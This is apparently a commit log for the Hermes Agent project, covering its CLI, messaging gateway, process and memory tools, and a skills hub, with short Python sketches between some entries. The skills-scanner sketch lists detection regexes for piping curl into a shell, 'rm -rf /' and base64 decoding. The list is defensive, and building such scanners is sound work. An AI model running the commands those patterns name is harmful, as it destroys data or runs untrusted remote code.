- Updated the `execute` method in various environment classes (`_LocalEnvironment`, `_SingularityEnvironment`, `_SSHEnvironment`, `_DockerEnvironment`) to support `stdin_data`, improving command execution flexibility.
- Removed the unique marker generation for heredoc in favor of direct stdin piping, simplifying file writing operations and enhancing performance for large files.
2026-02-19 14:50:51 -08:00
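Piping through stdin sidesteps ARG_MAX because the payload never appears on the command line; a local-environment sketch using subprocess:

    import subprocess

    def write_file_via_stdin(path: str, content: str) -> None:
        """Write arbitrarily large content without hitting ARG_MAX."""
        # cat > "$1" reads the payload from stdin, so only the path is an argument.
        subprocess.run(
            ["sh", "-c", 'cat > "$1"', "sh", path],
            input=content.encode("utf-8"),
            check=True,
        )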
teknium1
3191a9ba11 feat: add new conversation command and enhance command handling
- Introduced the `/new` command to start a new conversation, resetting the history.
- Updated command handling in the CLI and various platform adapters (Discord, Slack, Telegram) to support the new command.
- Added help command functionality to list available commands, improving user guidance.
- Enhanced command mapping for better integration across platforms, ensuring consistent command behavior.
2026-02-19 14:31:53 -08:00
teknium1
53e13fe1f1 feat: add Slack and WhatsApp setup prompts in setup wizard
- Implemented prompts for configuring Slack bot and WhatsApp bridge during the setup process.
- Added instructions for creating a Slack app and saving necessary tokens, enhancing user guidance.
- Included security recommendations for restricting bot access and a reminder to start the messaging gateway after setup.
2026-02-19 12:33:09 -08:00
teknium1
59cb0cecb2 feat: add messaging gateway startup functionality
- Introduced a new function to check for configured messaging platform tokens and prompt the user to start the gateway.
- Updated the installation scripts to automatically start the gateway if messaging tokens are detected, enhancing user experience.
- Expanded the README to include instructions for starting the gateway, ensuring users are informed about the necessary steps for message handling.
2026-02-19 09:43:46 -08:00
teknium1
1c6846c4c2 Merge branch 'main' of github.com:NousResearch/Hermes-Agent 2026-02-19 09:37:27 -08:00
teknium1
b88e441a07 feat: implement cross-channel messaging functionality
- Enhanced the `handle_send_message_function_call` to support sending messages to multiple platforms (Telegram, Discord, Slack, WhatsApp) using their respective APIs.
- Added error handling for missing parameters and platform configuration issues.
- Introduced asynchronous message sending with helper functions for each platform, improving responsiveness and reliability.
- Updated documentation within the function to clarify usage and requirements.
2026-02-19 09:37:25 -08:00
teknium1
4f57d7116d Improved stdout handling in the terminal tool: a background thread now continuously drains output, preventing deadlocks and keeping command execution from blocking. 2026-02-19 09:26:31 -08:00
teknium1
422607df7c feat: expand README with update and messaging gateway instructions
- Added detailed sections for updating the Hermes agent, including quick and manual update methods.
- Introduced a messaging gateway section with setup instructions for Telegram, Discord, and Slack, along with commands for managing the gateway.
- Included security recommendations and context file usage to enhance user guidance.
2026-02-19 02:10:02 -08:00
teknium1
3f4b494c61 refactor: streamline thinking spinner behavior in AIAgent
- Updated the logic for stopping the thinking spinner to improve clarity in tool execution messages.
- Removed unnecessary checks for tool calls, simplifying the spinner's stop behavior while maintaining informative output for users.
2026-02-19 01:56:04 -08:00
teknium1
109dffb242 fix: refine dynamic height adjustment for input area in CLI
- Updated the input area height calculation to ensure it matches the exact line count of content, eliminating extra blank space.
- Adjusted the return values to improve the responsiveness of the input area, enhancing user experience when adding newlines.
2026-02-19 01:53:36 -08:00
teknium1
0e8ee051c6 feat: replace framed input with horizontal rules in CLI
- Updated the input area layout by replacing the styled border frame with horizontal rules above and below the input, enhancing visual clarity.
- Adjusted the layout to ensure the input area grows dynamically with content while maintaining a consistent appearance with inline completions.
- Modified style definitions to reflect the new horizontal rule design, improving the overall aesthetics of the CLI.
2026-02-19 01:51:54 -08:00
teknium1
5c545e67f3 feat: add styled border frame to input area in CLI
- Wrapped the input area in a styled border frame to enhance visual structure and user experience.
- Updated layout to accommodate the framed input, ensuring consistent appearance with inline completions below the input area.
- Introduced new style definitions for the input frame to improve overall aesthetics of the CLI.
2026-02-19 01:49:50 -08:00
teknium1
2daf5e4296 fix: improve CLI output rendering and response display
- Adjusted console width handling to ensure consistent output formatting.
- Introduced a short sleep after flushing stdout to allow for proper rendering of tool/status lines before displaying responses.
- Enhanced the response display by modifying the rendering logic to improve visual clarity and prevent interleaving of output.
2026-02-19 01:46:56 -08:00
teknium1
d0c8dd78c2 fix: ensure proper output rendering in CLI by flushing stdout
- Added a flush of the StdoutProxy buffer to ensure that tool/status lines render above the response box, preventing interleaving of output.
- Combined the rendering of the response and the surrounding box into a single _cprint call for improved visual consistency and clarity.
2026-02-19 01:43:15 -08:00
teknium1
21c3e9973a feat: enhance CLI output formatting with dynamic borders
- Added dynamic top and bottom borders to the response output in the HermesCLI, improving visual structure and readability.
- Implemented width adjustments for the borders based on console size, ensuring consistent appearance across different terminal environments.
- This change enhances the overall user experience by providing a clearer separation of messages in the CLI.
2026-02-19 01:39:01 -08:00
teknium1
8e4d013154 feat: improve ANSI text rendering in CLI
- Introduced a new function `_cprint` to handle ANSI-colored text rendering using prompt_toolkit's native capabilities, ensuring proper display of colors and formatting.
- Updated various print statements in the HermesCLI to utilize `_cprint`, enhancing the visual output of user messages and conversation indicators.
- This change improves the overall user experience by providing clearer and more visually appealing text in the CLI.
2026-02-19 01:34:14 -08:00
teknium1
37fb01b17d feat: enhance conversation display with ANSI escape codes
- Added ANSI escape codes for improved visual formatting in the CLI, including bold and colored text for user messages and conversation headers.
- Simplified the output structure by removing unnecessary visual separators and adapting the display to enhance readability and user experience.
2026-02-19 01:23:23 -08:00
teknium1
ac0a70b369 feat: enhance input area height adjustment in CLI
- Implemented dynamic height adjustment for the input area in HermesCLI to accommodate varying content lines, ensuring that newlines (Alt+Enter) remain visible.
- This change improves usability by preventing internal scrolling of the input area when displaying output from the agent.
2026-02-19 01:14:53 -08:00
teknium1
a4bc6f73d7 refactor: simplify CLI layout by integrating inline completions
- Updated the HermesCLI layout to replace the floating completion menu with an inline CompletionsMenu, ensuring it appears consistently below the input area.
- This change enhances user experience by maintaining visibility of completions even after agent output fills the terminal, improving usability in non-full-screen modes.
2026-02-19 01:11:02 -08:00
teknium1
56ee8a5cc6 refactor: remove 'read' action from memory tool and agent logging
- Eliminated the 'read' action from the memory tool and related logging in the agent, streamlining the available actions to 'add', 'replace', and 'remove'.
- Updated error messages and documentation to reflect the removal of the 'read' action, ensuring clarity in the API's usage.
2026-02-19 01:03:08 -08:00
teknium1
440c244cac feat: add persistent memory system + SQLite session store
Two-part implementation:

Part A - Curated Bounded Memory:
- New memory tool (tools/memory_tool.py) with MEMORY.md + USER.md stores
- Character-limited (2200/1375 chars), § delimited entries
- Frozen snapshot injected into system prompt at session start
- Model manages pruning via replace/remove with substring matching
- Usage indicator shown in system prompt header

Part B - SQLite Session Store:
- New hermes_state.py with SessionDB class, FTS5 full-text search
- Gateway session.py rewritten to dual-write SQLite + legacy JSONL
- Compression-triggered session splitting with parent_session_id chains
- New session_search tool with Gemini Flash summarization of matched sessions
- CLI session lifecycle (create on launch, close on exit)

Also:
- System prompt now cached per session, only rebuilt on compression
  (fixes prefix cache invalidation from date/time changes every turn)
- Config version bumped to 3, hermes doctor checks for new artifacts
- Disabled in batch_runner and RL environments
2026-02-19 00:57:31 -08:00
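A sketch of the FTS5 side of such a store: a sessions table plus a plain FTS5 table is enough to show the search path. Schema and names are illustrative, not the actual SessionDB:

    import sqlite3

    con = sqlite3.connect("hermes_state.db")
    con.executescript("""
    CREATE TABLE IF NOT EXISTS sessions (
        id TEXT PRIMARY KEY,
        parent_session_id TEXT,  -- set when compression splits a session
        created_at REAL
    );
    CREATE VIRTUAL TABLE IF NOT EXISTS messages_fts USING fts5(
        session_id UNINDEXED,
        role UNINDEXED,
        content
    );
    """)

    def search_sessions(query: str, limit: int = 10):
        """Full-text search over message content, best matches first."""
        return con.execute(
            "SELECT session_id, snippet(messages_fts, 2, '[', ']', '...', 8) "
            "FROM messages_fts WHERE messages_fts MATCH ? ORDER BY rank LIMIT ?",
            (query, limit),
        ).fetchall()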
teknium1
655303f2f1 Add skill name resolution and enhanced install confirmation in Skills Hub
- Introduced a new function `_resolve_short_name` to convert short skill names to full identifiers, improving user experience during skill installation.
- Updated the `do_install` function to utilize the new resolution method for identifiers without slashes, ensuring accurate skill fetching.
- Enhanced the install confirmation process to include a disclaimer about third-party skills, emphasizing user responsibility and security awareness.
2026-02-18 16:20:35 -08:00
teknium1
14e59706b7 Add Skills Hub — universal skill search, install, and management from online registries
Implements the Hermes Skills Hub with agentskills.io spec compliance,
multi-registry skill discovery, security scanning, and user-driven
management via CLI and /skills slash command.

Core features:
- Security scanner (tools/skills_guard.py): 120 threat patterns across
  12 categories, trust-aware install policy (builtin/trusted/community),
  structural checks, unicode injection detection, LLM audit pass
- Hub client (tools/skills_hub.py): GitHub, ClawHub, Claude Code
  marketplace, and LobeHub source adapters with shared GitHubAuth
  (PAT + gh CLI + GitHub App), lock file provenance tracking, quarantine
  flow, and unified search across all sources
- CLI interface (hermes_cli/skills_hub.py): search, install, inspect,
  list, audit, uninstall, publish (GitHub PR), snapshot export/import,
  and tap management — powers both `hermes skills` and `/skills`

Spec conformance (Phase 0):
- Upgraded frontmatter parser to yaml.safe_load with fallback
- Migrated 39 SKILL.md files: tags/related_skills to metadata.hermes.*
- Added assets/ directory support and compatibility/metadata fields
- Excluded .hub/ from skill discovery in skills_tool.py

Updated 13 config/doc files including README, AGENTS.md, .env.example,
setup wizard, doctor, status, pyproject.toml, and docs.
2026-02-18 16:09:05 -08:00
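As a rough, hedged illustration of the trust-aware install policy in tools/skills_guard.py: the patterns and outcomes below are stand-ins, not the real 120-pattern set.

```python
# Stand-in threat patterns and policy; illustrative only.
import re

THREAT_PATTERNS = [r"curl[^|]*\|\s*(ba)?sh", r"rm\s+-rf\s+/", r"base64\s+-d"]

def scan(text: str) -> list[str]:
    """Return the patterns that match the skill's contents."""
    return [p for p in THREAT_PATTERNS if re.search(p, text)]

def install_policy(trust: str, hits: list[str]) -> str:
    # builtin skills install freely; flagged community skills quarantine.
    if trust == "builtin":
        return "install"
    if hits:
        return "quarantine" if trust == "community" else "prompt"
    return "install"
```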
teknium1
d59e93d5e9 Enhance platform toolset configuration and CLI toolset handling
- Introduced a new configuration section in `cli-config.yaml.example` for defining platform-specific toolsets, allowing for greater customization of available tools per platform.
- Updated the CLI to check for user-defined toolsets in the configuration, falling back to the default `hermes-cli` toolset if none are specified.
- Enhanced the `GatewayRunner` class to load platform-specific toolsets from the configuration, ensuring that the correct tools are enabled based on the platform being used.
2026-02-17 23:39:24 -08:00
teknium1
9e85408c7b Add todo tool for task management and enhance CLI features
- Introduced a new `todo_tool.py` for planning and tracking multi-step tasks, enhancing the agent's capabilities.
- Updated CLI to include a floating autocomplete dropdown for commands and improved user instructions for better navigation.
- Revised toolsets to incorporate the new `todo` tool and updated documentation to reflect changes in available tools and commands.
- Enhanced user experience with new keybindings and clearer command descriptions in the CLI.
2026-02-17 23:30:31 -08:00
teknium1
225ae32e7a Enhance CLI layout with floating completion menu
- Updated the layout in HermesCLI to include a floating completion menu, improving user experience by providing real-time suggestions as users type.
- Refactored the layout structure to utilize FloatContainer, ensuring the input area remains accessible while displaying the completion menu dynamically.
2026-02-17 23:04:48 -08:00
teknium1
50ef18644b Update multiline input instructions in HermesCLI
- Revised user instructions to reflect the removal of the Ctrl+Enter key binding for new lines, simplifying the input method.
- Clarified that Alt+Enter is now the sole key for multi-line input, enhancing user experience.
2026-02-17 22:53:48 -08:00
teknium1
41608beb35 Update multiline input handling in HermesCLI
- Removed the Shift+Enter key binding for inserting new lines, simplifying the input method.
- Introduced Ctrl+Enter as the primary key for multi-line input, ensuring better compatibility across terminals.
- Updated user instructions to reflect the new key bindings for a clearer user experience.
2026-02-17 22:51:25 -08:00
teknium1
d9a8e421a4 Enhance multiline input handling in HermesCLI
- Patched prompt_toolkit to recognize Shift+Enter as a distinct key for inserting new lines, improving the multiline input experience.
- Added Alt+Enter as a fallback for terminals that do not support Shift+Enter, ensuring consistent functionality across different environments.
- Updated user instructions to reflect the new key bindings for multiline input.
2026-02-17 21:53:19 -08:00
teknium1
d7cef744ec Add autocomplete and multiline support in HermesCLI input
- Introduced SlashCommandCompleter for command autocompletion, enhancing user experience by suggesting commands as users type.
- Enabled multiline input with Shift+Enter, allowing users to enter longer messages more conveniently.
- Implemented paste detection to handle large text inputs, saving them to temporary files and replacing them with compact references in the input area.
- Updated input area styling and hint display to improve usability and feedback during agent operation.
2026-02-17 21:47:54 -08:00
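A hedged sketch of the paste-detection idea; the threshold and the reference format are assumptions:

```python
# Large pasted input is written to a temp file and replaced with a
# compact reference in the input area. Threshold is illustrative.
import tempfile

PASTE_THRESHOLD = 1000  # chars; assumed, not the real cutoff

def compact_paste(text: str) -> str:
    if len(text) < PASTE_THRESHOLD:
        return text
    with tempfile.NamedTemporaryFile(
        "w", suffix=".txt", delete=False, prefix="hermes_paste_"
    ) as f:
        f.write(text)
        return f"[pasted {len(text)} chars -> {f.name}]"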
teknium1
54cbf30c14 Refactor dynamic prompt and layout in HermesCLI
- Updated the dynamic prompt to display the Hermes symbol when the agent is active, enhancing user feedback.
- Introduced a spacer line in the layout to prevent spinner output from overlapping the input cursor, improving usability.
- Adjusted the overall layout to maintain a clean interface while accommodating dynamic elements.
2026-02-17 21:34:49 -08:00
teknium1
dfa3c6265c Refactor CLI input prompt and layout in HermesCLI
- Updated the input area prompt to dynamically reflect agent status, enhancing user feedback during operation.
- Removed the status line from the layout to streamline the interface, focusing solely on the input area.
- Adjusted styling for prompt states to improve visual clarity and user experience.
2026-02-17 21:33:00 -08:00
teknium1
a7f52911e1 Refactor CLI output formatting in AIAgent
- Removed ANSI escape codes for color in tool activity messages to simplify output.
- Updated the _get_cute_tool_message method to provide a cleaner, more consistent format for various tool activities.
- Enhanced readability by aligning messages and removing unnecessary complexity, ensuring a more straightforward user experience.
2026-02-17 21:29:23 -08:00
teknium1
1e31614572 Refactor tool activity messages in AIAgent for improved CLI output
- Introduced ANSI escape codes for color-coded CLI messages to enhance readability.
- Updated the _get_cute_tool_message method to generate clean, aligned activity lines for various tools, replacing kawaii ASCII art with a more structured format.
- Simplified message construction for web tools, terminal commands, and process management, ensuring consistent and scannable output.
2026-02-17 21:26:41 -08:00
teknium1
3b615b0f7a Enhance tool previews in AIAgent and GatewayRunner
- Updated the _build_tool_preview function to include detailed previews for new tools: 'todo', 'send_message', and various 'rl_' tools, improving user feedback during task execution.
- Added emoji representations for tools in GatewayRunner, including 'process', 'todo', and 'send_message', to enhance visual clarity in progress messages.
- Improved handling of task management and messaging outputs, ensuring more informative and user-friendly interactions.
2026-02-17 17:11:31 -08:00
teknium1
e184f5ab3a Add todo tool for agent task planning and management
Single `todo` tool that reads (no params) or writes (provide todos array
with merge flag). In-memory TodoStore on AIAgent, no system prompt
mutation, behavioral guidance in tool description only. State re-injected
after context compression events. Gateway sessions hydrate from
conversation history. Added to all platform toolsets.

Also wired into RL agent_loop.py with per-run TodoStore and fixed
browser_snapshot user_task passthrough from first user message.
2026-02-17 17:02:33 -08:00
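A minimal in-memory sketch of the read-or-write-with-merge shape described above; field names are assumptions:

```python
# Illustrative TodoStore: read() returns state, write() replaces or
# merges by id. The real store's item schema may differ.
class TodoStoreSketch:
    def __init__(self):
        self.todos: list[dict] = []

    def read(self) -> list[dict]:
        return list(self.todos)

    def write(self, todos: list[dict], merge: bool = False) -> None:
        if not merge:
            self.todos = list(todos)
            return
        # merge: update existing items by id, append unknown ones
        by_id = {t["id"]: t for t in self.todos}
        for t in todos:
            by_id[t["id"]] = t
        self.todos = list(by_id.values())
```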
Sam Herring
d0f82e6dcc Removing random project notes doc 2026-02-17 08:02:29 -08:00
teknium1
49e1f9ea89 Refactor TODO.md to summarize future improvements for the Hermes Agent, focusing on subagent architecture, task management, dynamic skills expansion, and interactive clarifying questions. Key ideas include context isolation for subagents, task decomposition, progress tracking, and skill acquisition from successful tasks. 2026-02-17 03:24:38 -08:00
teknium1
6731230d73 Add special handling for 'process' tool in _build_tool_preview function
- Enhanced the _build_tool_preview function to include specific formatting for the 'process' tool, displaying action, session_id, data, and timeout when applicable.
- This update improves the clarity of tool previews, particularly for actions that require session tracking and timeout management.
2026-02-17 03:18:27 -08:00
teknium1
ec59d71e60 Update PTY write handling in ProcessRegistry to ensure data is encoded as bytes before writing. This change improves compatibility with string inputs and clarifies the expected data type in comments. 2026-02-17 03:14:47 -08:00
teknium1
bdac541d1e Rename OPENAI_API_KEY to HERMES_OPENAI_API_KEY in configuration and codebase for clarity and to avoid conflicts. Update related documentation and error messages to reflect the new key name, ensuring backward compatibility with existing setups. 2026-02-17 03:11:17 -08:00
teknium1
061fa70907 Add background process management with process tool, wait, PTY, and stdin support
New process registry and tool for managing long-running background processes
across all terminal backends (local, Docker, Singularity, Modal, SSH).

Process Registry (tools/process_registry.py):
- ProcessSession tracking with rolling 200KB output buffer (reader
  sketched after this commit)
- spawn_local() with optional PTY via ptyprocess for interactive CLIs
- spawn_via_env() for non-local backends (runs inside sandbox, never on host)
- Background reader threads per process (Popen stdout or PTY)
- wait() with timeout clamping, interrupt support, and transparent limit reporting
- JSON checkpoint to ~/.hermes/processes.json for gateway crash recovery
- Module-level singleton shared across agent loop, gateway, and RL

Process Tool (model_tools.py):
- 7 actions: list, poll, log, wait, kill, write, submit
- Paired with terminal in all toolsets (CLI, messaging, RL)
- Timeout clamping with transparent notes in response

Terminal Tool Updates (tools/terminal_tool.py):
- Replaced nohup background mode with registry spawn (returns session_id)
- Added workdir parameter for per-command working directory
- Added check_interval parameter for gateway auto-check watchers
- Added pty parameter for interactive CLI tools (Codex, Claude Code)
- Updated TERMINAL_TOOL_DESCRIPTION with full background workflow docs
- Cleanup thread now respects active background processes (won't reap sandbox)

Gateway Integration (gateway/run.py, session.py, config.py):
- Session reset protection: sessions with active processes exempt from reset
- Default idle timeout increased from 2 hours to 24 hours
- from_dict fallback aligned to match (was 120, now 1440)
- session_key env var propagated to process registry for session mapping
- Crash recovery on gateway startup via checkpoint probe
- check_interval watcher: asyncio task polls process, delivers updates to platform

RL Safety (environments/):
- tool_context.py cleanup() kills background processes on episode end
- hermes_base_env.py warns when enabled_toolsets is None (loads all tools)
- Process tool safe in RL via wait() blocking the agent loop

Also:
- Added ptyprocess as optional dependency (in pyproject.toml [pty] extra + [all])
- Fixed pre-existing bug: rl_test_inference missing from TOOL_TO_TOOLSET_MAP
- Updated AGENTS.md with process management docs and project structure
- Updated README.md terminal section with process management overview
2026-02-17 02:51:31 -08:00
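For the rolling-buffer reader behind ProcessSession, a simplified sketch; class and method names are illustrative, not the registry's actual API:

```python
# Background reader thread keeps only the newest BUFFER_CAP bytes of
# a spawned process's combined output.
import subprocess
import threading

BUFFER_CAP = 200 * 1024  # 200KB rolling output buffer

class ProcessSessionSketch:
    def __init__(self, cmd: list[str]):
        self.proc = subprocess.Popen(
            cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
        )
        self.buffer = b""
        self.lock = threading.Lock()
        threading.Thread(target=self._reader, daemon=True).start()

    def _reader(self) -> None:
        while True:
            chunk = self.proc.stdout.read1(4096)  # whatever is available
            if not chunk:
                break
            with self.lock:
                self.buffer = (self.buffer + chunk)[-BUFFER_CAP:]

    def log(self) -> str:
        with self.lock:
            return self.buffer.decode(errors="replace")
```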
teknium1
48b5cfd085 Add skip_context_files option to AIAgent for batch processing
- Introduced a new parameter `skip_context_files` in the AIAgent class to control the inclusion of context files (SOUL.md, AGENTS.md, .cursorrules) in the system prompt.
- Updated the _process_single_prompt function to set `skip_context_files` to True, preventing pollution of trajectories during batch processing and data generation.
2026-02-16 22:40:31 -08:00
teknium1
a7609c97be Update docs to match backend key rename and CWD behavior
- cli-config.yaml.example: env_type → backend everywhere, matching the
  documented config key that hermes_cli/config.py and README already use
- cli-config.yaml.example: added comments clarifying cwd is a path
  INSIDE the target environment for non-local backends
- AGENTS.md: updated terminal.cwd description to explain that "." only
  resolves to host CWD for the local backend
- .env.example: updated TERMINAL_CWD comment to warn against using
  host-local paths with remote backends, lists per-backend defaults
2026-02-16 22:31:41 -08:00
teknium1
c33feb6dc9 Fix host CWD leaking into non-local terminal backends
When using Modal, Docker, SSH, or Singularity as the terminal backend
from the CLI, the agent resolved cwd: "." to the host machine's local
path (e.g. /Users/rewbs/code/hermes-agent) and passed it to the remote
sandbox, where it doesn't exist. All commands failed with "No such file
or directory".

Root cause: cli.py unconditionally resolved "." to os.getcwd() and wrote
it to TERMINAL_CWD regardless of backend type. Every tool then used that
host-local path as the working directory inside the remote environment.

Fixes:
- cli.py: only resolve "." to os.getcwd() for the local backend. For all
  remote backends (ssh, docker, modal, singularity), leave TERMINAL_CWD
  unset so the tool layer uses per-backend defaults (/root, /, ~, etc.)
- terminal_tool.py: added sanity check -- if TERMINAL_CWD contains a
  host-local prefix (/Users/, /home/, C:\) for a non-local backend, log
  a warning and fall back to the backend's default
- terminal_tool.py: SSH default CWD is now ~ instead of os.getcwd()
- file_operations.py: last-resort CWD fallback changed from os.getcwd()
  to "/" so host paths never leak into remote file operations
2026-02-16 22:30:04 -08:00
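The sanity check reduces to something like the following sketch; the prefix list matches the commit message, the helper name is hypothetical:

```python
# Reject host-local working directories for remote backends and fall
# back to the backend's default instead.
HOST_PREFIXES = ("/Users/", "/home/", "C:\\")

def safe_cwd(cwd: str | None, backend: str, default: str) -> str:
    if backend == "local":
        return cwd or default
    if cwd and cwd.startswith(HOST_PREFIXES):
        print(f"warning: host-local cwd {cwd!r} ignored for {backend} backend")
        return default
    return cwd or default
```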
teknium1
2c7deb41f6 Fix Modal backend not working from CLI
Two config systems used different key names for the terminal backend:
- hermes_cli/config.py, README, and all docs use "terminal.backend"
- cli.py's env var mapping only recognized "terminal.env_type"

Users following the docs who set `backend: modal` in ~/.hermes/config.yaml
had it silently ignored -- TERMINAL_ENV always defaulted to "local".

Additionally, when no config file existed, cli.py's hardcoded defaults
overwrote any TERMINAL_ENV=modal set in .env, despite the comment saying
"env vars take precedence."

Fixes:
- cli.py now normalizes "backend" -> "env_type" (backend takes precedence)
- Defaults no longer overwrite .env when no config file terminal section exists
- hermes status reads from config as fallback when env var isn't set

Also fixes four related bugs found in the Modal/sandbox lifecycle:
- file_tools cache not cleared on sandbox cleanup (stale ops on dead sandbox)
- Global lock held during slow Modal teardown (blocked all tool calls 10-15s)
- Race condition in file_tools between existence check and access (KeyError)
- Per-task creation locks never cleaned up (memory leak)
2026-02-16 19:47:23 -08:00
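The key normalization amounts to roughly this sketch; it is assumption-level, and the real logic in cli.py handles more cases:

```python
# "backend" (the documented key) takes precedence over legacy
# "env_type"; when neither is set, any TERMINAL_ENV from .env is
# left untouched so env vars actually take precedence.
import os

def resolve_terminal_env(terminal_cfg: dict) -> None:
    backend = terminal_cfg.get("backend") or terminal_cfg.get("env_type")
    if backend:
        os.environ["TERMINAL_ENV"] = backend
```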
teknium1
8117d0adab Refactor file operations and environment management in file_tools and terminal_tool
- Improved the caching mechanism for ShellFileOperations to ensure stale entries are invalidated when environments are cleaned up.
- Enhanced thread safety by refining the use of locks during environment creation and cleanup processes.
- Streamlined the cleanup of inactive environments to prevent blocking other tool calls, ensuring efficient resource management.
- Added error handling and messaging improvements for better user feedback during environment cleanup.
2026-02-16 19:37:40 -08:00
teknium1
01a3a6ab0d Implement cleanup guard to prevent multiple executions on exit
- Introduced a new cleanup function that ensures terminal and browser sessions are cleaned up only once during application exit.
- Updated atexit registration to use the new cleanup function, enhancing resource management and preventing potential issues from multiple cleanup calls.
- Modified terminal cleanup messaging to only display when environments are cleaned, improving user feedback.
2026-02-16 02:43:45 -08:00
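The guard pattern is essentially a run-once flag registered with atexit; a minimal sketch, with the actual session teardown elided:

```python
# Ensure cleanup runs exactly once even if invoked from multiple
# exit paths (atexit, signal handlers, explicit calls).
import atexit

_cleaned = False

def _cleanup_once() -> None:
    global _cleaned
    if _cleaned:
        return
    _cleaned = True
    # ... clean up terminal environments and browser sessions here ...

atexit.register(_cleanup_once)
```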
teknium1
45a8098d3a Remove browserbase SDK check and add Node.js and agent-browser validation in doctor script
- Removed the check for the browserbase SDK from the optional packages list.
- Added validation for Node.js installation and the presence of the agent-browser package, providing feedback on their status for browser automation tools.
2026-02-16 02:41:24 -08:00
teknium1
60812ae041 Enhance configuration checks and persona file creation in doctor and install scripts
- Updated the doctor script to load environment variables from user-specific and project-specific `.env` files, improving configuration management.
- Added checks for the existence of the `SOUL.md` persona file, providing feedback on its status and creating it with a template if missing.
- Enhanced install scripts to create the `SOUL.md` file if it doesn't exist, ensuring users can easily customize the agent's personality.
2026-02-16 02:38:19 -08:00
teknium1
635bec06cb Update tool definitions handling in GatewayRunner
- Modified the retrieval of tool definitions to use the agent result's "tools" key, ensuring accurate logging in the transcript.
- Enhanced the response structure to include tools in the final output, improving the clarity of tool usage in session interactions.
2026-02-16 00:55:18 -08:00
teknium1
0f58dfdea4 Enhance agent response handling and transcript logging
- Refactored the agent response processing to return a comprehensive result dictionary, including final responses and full message history.
- Improved transcript logging to capture the complete conversation, including tool calls and intermediate reasoning, facilitating session resumption and debugging.
- Added handling for fresh sessions to include tool definitions in the transcript for clarity.
- Implemented logic to filter and timestamp new messages, ensuring accurate logging of user and assistant interactions.
2026-02-16 00:53:17 -08:00
teknium1
dd5fe334f3 Refactor configuration handling to improve user experience
- Implemented deep copy of DEFAULT_CONFIG to prevent mutations during config loading.
- Enhanced user config merging process to clarify the deep merge of user values over defaults.
- Added newline handling when appending environment variables to ensure proper formatting.
- Updated the set_config_value function to write only user-specific configurations back to the file, avoiding overwriting default values.
2026-02-16 00:33:45 -08:00
teknium1
e0c9d495ef Refine configuration migration process to improve user experience
- Updated prompts for the OPENAI_BASE_URL to clarify its use for custom endpoints.
- Enhanced the migration function to skip "advanced" environment variables during interactive configuration, streamlining the setup for standard users.
- Improved messaging for missing optional API keys, ensuring clearer guidance for users during configuration.
2026-02-15 21:53:59 -08:00
teknium1
2f34e6fd30 Update OpenAI configuration prompts for clarity and detail
- Revised descriptions and prompts for the OPENAI_BASE_URL and OPENAI_API_KEY environment variables to enhance user understanding.
- Added a URL reference for the OPENAI_API_KEY to guide users in obtaining their API key.
- Specified the use of the API key for voice transcription and custom endpoints, improving the overall configuration documentation.
2026-02-15 21:48:07 -08:00
teknium1
69aa35a51c Add messaging platform enhancements: STT, stickers, Discord UX, Slack, pairing, hooks
Major feature additions inspired by OpenClaw/ClawdBot integration analysis:

Voice Message Transcription (STT):
- Auto-transcribe voice/audio messages via OpenAI Whisper API
- Download voice to ~/.hermes/audio_cache/ on Telegram/Discord/WhatsApp
- Inject transcript as text so all models can understand voice input
- Configurable model (whisper-1, gpt-4o-mini-transcribe, gpt-4o-transcribe)

Telegram Sticker Understanding:
- Describe static stickers via vision tool with JSON-backed cache
- Cache keyed by file_unique_id avoids redundant API calls
- Animated/video stickers get emoji-based fallback description

Discord Rich UX:
- Native slash commands (/ask, /reset, /status, /stop) via app_commands
- Button-based exec approvals (Allow Once / Always Allow / Deny)
- ExecApprovalView with user authorization and timeout handling

Slack Integration:
- Full SlackAdapter using slack-bolt with Socket Mode
- DMs, channel messages (mention-gated), /hermes slash command
- File attachment handling with bot-token-authenticated downloads

DM Pairing System (sketched after this commit):
- Code-based user authorization as alternative to static allowlists
- 8-char codes from unambiguous alphabet, 1-hour expiry
- Rate limiting, lockout after failed attempts, chmod 0600 on data
- CLI: hermes pairing list/approve/revoke/clear-pending

Event Hook System:
- File-based hook discovery from ~/.hermes/hooks/
- HOOK.yaml + handler.py per hook, sync/async handler support
- Events: gateway:startup, session:start/reset, agent:start/step/end
- Wildcard matching (command:* catches all command events)

Cross-Channel Messaging:
- send_message agent tool for delivering to any connected platform
- Enables cron job delivery and cross-platform notifications

Human-Like Response Pacing:
- Configurable delays between message chunks (off/natural/custom)
- HERMES_HUMAN_DELAY_MODE env var with min/max ms settings

Warm Injection Message Style:
- Retrofitted image vision messages with friendly kawaii-consistent tone
- All new injection messages (STT, stickers, errors) use warm style

Also: updated config migration to prompt for optional keys interactively,
bumped config version, updated README, AGENTS.md, .env.example,
cli-config.yaml.example, install scripts, pyproject.toml, and toolsets.
2026-02-15 21:38:59 -08:00
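A hedged sketch of the pairing-code issue/validate flow from the DM Pairing System above; the exact alphabet beyond "unambiguous" is an assumption:

```python
# 8-char pairing codes from an unambiguous alphabet, 1-hour expiry.
import secrets
import time

ALPHABET = "ABCDEFGHJKLMNPQRSTUVWXYZ23456789"  # no 0/O, 1/I/L
EXPIRY_S = 3600

def new_pairing_code() -> tuple[str, float]:
    code = "".join(secrets.choice(ALPHABET) for _ in range(8))
    return code, time.time() + EXPIRY_S

def is_valid(code: str, issued: dict[str, float]) -> bool:
    # issued maps code -> expiry timestamp
    return code in issued and time.time() < issued[code]
```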
teknium1
5404a8fcd8 Enhance image handling and analysis capabilities across platforms
- Updated the vision tool to accept both HTTP/HTTPS URLs and local file paths for image analysis.
- Implemented caching of user-uploaded images in local directories to ensure reliable access for the vision tool, addressing issues with ephemeral URLs.
- Enhanced platform adapters (Discord, Telegram, WhatsApp) to download and cache images, allowing for immediate analysis and enriched message context.
- Added a new method to auto-analyze images attached by users, enriching the conversation with detailed descriptions.
- Improved documentation for image handling processes and updated related functions for clarity and efficiency.
2026-02-15 16:10:50 -08:00
teknium1
eb49936a60 Update documentation and installation scripts for TTS audio formats
- Clarified the requirements for Telegram voice bubbles, specifying the need for ffmpeg when using Edge TTS.
- Enhanced README and messaging documentation to detail audio delivery formats across platforms.
- Improved installation script messages to inform users about the necessity of ffmpeg for proper audio playback on Telegram.
2026-02-14 16:16:54 -08:00
teknium1
ff9ea6c4b1 Enhance TTS tool to support platform-specific audio formats
- Added detection of the platform from the environment variable to determine the appropriate audio output format.
- Implemented logic to output Opus (.ogg) files for Telegram when using compatible TTS providers, while defaulting to MP3 for others.
2026-02-14 16:13:26 -08:00
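Roughly, the format selection looks like this sketch; the platform env var name is an assumption:

```python
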